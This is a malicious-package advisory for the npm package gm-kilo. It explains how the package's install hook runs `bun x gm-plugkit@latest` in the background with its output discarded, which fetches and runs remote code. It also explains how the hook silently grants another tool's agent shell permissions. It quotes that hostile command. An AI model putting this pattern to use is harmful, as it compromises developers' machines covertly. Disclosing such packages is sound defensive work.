npm · Malicious package advisory
Malwaregm-kilo
MAL-2026-4574
Malicious code in gm-kilo (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b4a35ea8669a2b02f60117ecc483176741399084b0fbebf11900d0a89505d9fb) package.json declares an `install` lifecycle script that runs `bin/gm-kilo.js install`. At install time, the script executes `bun x gm-plugkit@latest spool > /dev/null 2>&1 &` via execSync, which downloads and runs whatever the latest published version of gm-plugkit is using the Bun alternate runtime. The version pin is mutable (`@latest`), the command output is redirected to /dev/null, and the process is detached into the background — these properties are characteristic of covert remote-code execution at install time. Whoever controls publishing of gm-plugkit can deliver arbitrary code to every machine that installs gm-kilo, and the install hook hides that execution from the installer's terminal. Additionally, the install script writes to `~/.kilo/config.yml` (a separate tool's configuration file) to register a `gm` agent with `Bash(*plugkit*)` shell-execute permission, silently expanding that tool's trust surface to invoke plugkit-related commands without user consent.
Compromised versions (1)
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.